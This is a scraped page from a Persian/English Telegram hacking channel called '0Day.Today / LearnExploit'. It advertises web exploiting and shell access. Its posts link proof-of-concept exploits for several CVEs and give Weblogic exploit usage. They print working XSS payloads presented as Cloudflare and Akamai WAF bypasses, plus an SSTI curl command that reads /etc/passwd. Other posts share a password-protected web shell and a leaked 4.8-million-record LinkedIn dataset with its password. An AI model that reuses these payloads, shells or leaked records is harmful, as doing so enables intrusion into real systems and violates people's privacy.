0Day.Today | Learn Exploit | Zero World | Dark web |
18.8K subscribers
1.22K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
LPE via StorSvc

Windows Local Privilege Escalation via StorSvc service (writable SYSTEM path DLL Hijacking)

Github

#POC #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝2
این آخرین باری هست که اینترنت اکسپلورر رو میبینید، مایکروسافت امروز آپدیتی برای حذفش منتشر میکنه . 🖤

#News
——————
0Day.Today
@LearnExploit
@Tech_Army
🫡13😢7👌21👍1👏1🎉1
Unusual 403 Bypass to a full website takeover

Read Here

#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
3👍1
SSH Remote Code Execution ( SSH Zero-Day )

Github

#SSH
——————
0Day.Today
@LearnExploit
@Tech_Army
reNgine 🔥

The only web application recon tool you will ever need!

Github

#Osint #Recon #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
4❤‍🔥1
CVE-2023-23752

An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints

severity: high 🆘

Github

#CVE #Joomla
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
┌──(LearnExploit㉿kali)-[~]
└─$ ./Thank-you-all

#4k
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥8
Cloudflare bypass & template injection to XSS in one shoot

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

#cloudflare #bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
4
تمرینی

Link

Pass: $SZh496W&#uv

#shell #alfa
——————
0Day.Today
@LearnExploit
@Tech_Army
👍42❤‍🔥1
آموزش نصب Metasploit روی ویندوز

Metasploit

#metasploit #exploit #windows

iliyahr
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥41👍1
Akamai WAF bypass through right-click

<details onauxclick=confirm`xss`></details>

#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
22
SSTI to RCE:

curl -X POST http://test.com:8080 -H "Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k" --data "name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}"

#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥5👍1
POC for CVE-2022-39952

Github

#CVE #POC #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🤔31👍1🤝1
بزنید حال کنین

vmess://ewogICJ2IjogIjIiLAogICJwcyI6ICJATGVhcm5leHBsb2l0IiwKICAiYWRkIjogIjU0LjM4Ljk5LjI1MyIsCiAgInBvcnQiOiAzNjg4MSwKICAiaWQiOiAiM2I5MzJmYjYtYmU4ZS00NjM0LTk5MDUtMjNjNTVkZTM2NWZjIiwKICAiYWlkIjogMCwKICAibmV0IjogIndzIiwKICAidHlwZSI6ICJub25lIiwKICAiaG9zdCI6ICIiLAogICJwYXRoIjogIi8iLAogICJ0bHMiOiAibm9uZSIKfQ==

——————
0Day.Today
@LearnExploit
@Tech_Army
5
Weblogic-CVE-2023-21839

نسخه
های آسیب پذیر :

12.2.1.3.0

12.2.1.4.0

14.1.1.0.0

Github

Usage :

java -jar target ip: port ldap address

#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
31👍1👨‍💻1
Linkedin_sql.7z
123.2 MB
4.8M LinkedIn Profile Company Details With Below Data

id , company_url_domain , company_name , country , industry , linkedin_url , total_employee_estimate , year_founded

Password: weleakdatabase

#linkedin #leak
——————
0Day.Today
@LearnExploit
@Tech_Army
👍2🔥21❤‍🔥1